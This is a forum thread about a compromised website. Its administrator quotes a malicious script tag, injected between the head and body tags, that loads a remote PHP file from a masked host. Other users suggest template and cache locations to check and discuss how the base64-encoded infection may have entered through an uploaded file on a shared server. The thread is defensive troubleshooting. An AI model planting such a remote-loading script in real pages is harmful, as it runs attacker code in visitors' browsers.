Code Insertion Between Head and Body Tags

[jcjordan]

On one of the websites that I administer, I have a code injection between the head and body tags. I have searched the source code, but I have yet to figure out where the culprit is hiding.

Code::

</head><script src=http://xxx.xxx/piudurres/indexu.php ></script> <body>

Any help would be greatly appreciated.

[NanoCaiordo]

/themes/*/template/index.php
if you can't find it clear the /cache/

[greenday2k]

Themmes/yourtheme/template/header.html

cache folder. Check your cache folder permissions.

[jcjordan]

I eventually found it, however, most of it was base64 encoded. It took over almost all javascript files and many php files including config.php.

[jcjordan]

I am still working on trying to figure out how it got in. I have had the one site for about 2 years with no problems and all of a sudden I have two sites both attacked almost concurrently. There have been no changes on hosting or configuration. The first site was infected by an upload of /rss/page.php.

[NanoCaiordo]

jcjordan, most luckily the attach was done from within the server ... however which files they modified? Asking because I'm working on few solutions against those kind of attacks and an extensive list of modified files would really help.

Both sites attacked on the same time? Must be done from within the server, is it a shared server?

[jcjordan]

I have a list of most of the files that they modified and what I think is the original culprit. If you would like, I can send the list and file to you.

Yes, it is a shared server and I have the security team checking into it now.

It was not simultaneous, but it did happen very quickly. I ended up having to kill the site completely, verify that the files were clean and then re-up.

[NanoCaiordo]

pm sent

[jcjordan]

Email sent. I sent you the logs, the list of files changed over different domains, and the catalyst file called /rss/page.php.

[NanoCaiordo]

Never received your email :), please send it again.